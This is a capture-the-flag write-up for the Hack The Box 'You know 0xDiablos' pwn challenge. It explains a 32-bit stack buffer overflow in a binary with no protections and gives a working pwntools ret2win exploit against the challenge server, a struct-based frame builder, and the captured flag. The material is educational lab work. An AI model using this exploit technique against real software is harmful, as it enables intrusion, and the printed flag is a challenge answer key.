# You know 0xDiablos

{% file src="<https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F95NbehpduGRP0OEebjPK%2FYou%20know%200xDiablos.zip?alt=media&token=cb437cc6-8310-4f4a-92a4-e2217d8fa143>" %}

## <mark style="color:red;">Challenge Description:</mark>

```
I missed my flag
```

### <mark style="color:blue;">Basic File Enumeration:</mark>

This is a 32-bit binary that is not stripped, which makes reversing easier since the function names are preserved. checksec shows that the binary has no protections at all: no stack canary, NX disabled and no PIE.

```bash
┌──(kali㉿kali)-[~/hackthebox/pwn/diablos]
└─$ file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=ab7f19bb67c16ae453d4959fba4e6841d930a6dd, for GNU/Linux 3.2.0, not stripped

┌──(kali㉿kali)-[~/hackthebox/pwn/diablos]
└─$ checksec --file=vuln
[*] '/home/kali/hackthebox/pwn/diablos/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
```

Let's open the binary in Ghidra.

There are three functions of interest:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fqw9yPSkZuIwo1nZPwlcq%2Fimage.png?alt=media&#x26;token=3be4b4eb-c925-4eff-a13c-39af06b7b615" alt=""><figcaption></figcaption></figure></div>

The main function is not vulnerable, but the vuln function is clearly vulnerable to a stack buffer overflow since it never checks the size of the input supplied by the user.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FqquoiVgeX7ZkgJrrpiXH%2Fimage.png?alt=media&#x26;token=65b6fdfc-abdd-4595-b0a3-2f5d47ba36e3" alt=""><figcaption></figcaption></figure></div>

The flag function is the win function, but it takes parameters that are compared against hardcoded hex values; only if the comparison succeeds does it print the contents of flag.txt.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FsZpgZaBclPIj1bospyP1%2Fimage.png?alt=media&#x26;token=620dbcce-840d-4ea3-b3fc-20b6ab03a09f" alt=""><figcaption></figcaption></figure></div>

So we will overflow the buffer, overwrite the saved EIP with the address of the flag function, and also supply the correct values for the flag function's parameters. Since this is a 32-bit (cdecl) binary, the function arguments are passed on the stack above the return pointer, so they are written right after the fake return address in the payload.

### <mark style="color:blue;">Find Offset to EIP:</mark>

We can find it with gdb, or simply in Ghidra by calculating the distance between the return address and the vulnerable local variable.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FGinlLDoZGLRZ1xy9rBUX%2Fimage.png?alt=media&#x26;token=6b99837d-726b-4e42-94d5-3d82586674ad" alt=""><figcaption></figcaption></figure></div>

So the offset from the start of the buffer to the saved return address is 188 bytes (0xbc -> 188).

### <mark style="color:blue;">Exploit:</mark>

```python
from pwn import *

# Set up pwntools for the correct architecture
exe = './vuln'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# io = process(exe)
io = remote('83.136.249.57', 47937)
offset = 188 # offset to EIP
payload = flat(
	offset * b'A',
	elf.functions.flag,
	0, # Return Pointer
	-0x21524111, #param1
	-0x3f212ff3  #param2
)

io.sendline(payload)

io.interactive()
```
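To see why the frame in the script above is laid out as it is, and why the two negative constants work, here is the same 32-bit cdecl frame built by hand with only `struct` and then parsed back for inspection. This is an added example and not part of the original writeup; `FLAG_ADDR` is a placeholder, since the real address of `flag` comes from the ELF (`elf.functions.flag` in the script).

```python
import struct

# Added example, not from the original writeup. Rebuilds the frame that the
# pwntools script sends, without pwntools, to make the layout explicit.

OFFSET = 188             # bytes from the buffer start to the saved EIP (from Ghidra)
FLAG_ADDR = 0x08040000   # PLACEHOLDER, not the real address of flag(); read it from the ELF


def to_u32(value):
    """View a Python int as an unsigned 32-bit word (two's complement wrap).

    The flag function compares its arguments as 32-bit words, so a negative
    constant such as -0x21524111 is seen as 0x100000000 - 0x21524111.
    """
    return value & 0xFFFFFFFF


def build_frame(offset, win_addr, args, fake_ret=0):
    """Lay out a 32-bit cdecl return frame.

    Order on the stack, lowest address first:
      padding (fills the buffer up to the saved EIP)
      new EIP            -> address of the win function
      fake return address-> where the win function would return to
      args[0], args[1]   -> the win function's parameters, above the return pointer
    """
    words = [win_addr, fake_ret] + list(args)
    return b"A" * offset + b"".join(struct.pack("<I", to_u32(w)) for w in words)


def parse_frame(frame, offset):
    """Inverse of build_frame: split the tail of the frame back into 32-bit words."""
    body = frame[offset:]
    return [struct.unpack("<I", body[i:i + 4])[0] for i in range(0, len(body), 4)]


if __name__ == "__main__":
    payload = build_frame(OFFSET, FLAG_ADDR, [-0x21524111, -0x3f212ff3])
    eip, ret, p1, p2 = parse_frame(payload, OFFSET)
    print(f"payload length : {len(payload)} bytes")
    print(f"saved EIP      : {eip:#010x}")
    print(f"fake return    : {ret:#010x}")
    print(f"param1 (u32)   : {p1:#010x}")
    print(f"param2 (u32)   : {p2:#010x}")
```

Running it shows the unsigned values the comparison in `flag` actually sees for the two negative constants; in the pwntools script, `flat` performs the same signed-to-32-bit packing.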

Now let's run the exploit:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F1OkTksajvvK0OHdgtZD6%2Fimage.png?alt=media&#x26;token=775f768d-cb8e-4595-ae3d-ebcbcfc74413" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Flag:</mark>

```
HTB{0ur_Buff3r_1s_not_healthy}
```

<figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FjKoOMW5PEXpzrmdzMmk1%2Fimage.png?alt=media&#x26;token=4ea65a50-696d-4ff8-b7d3-fa6bd2df89a5" alt=""><figcaption></figcaption></figure>
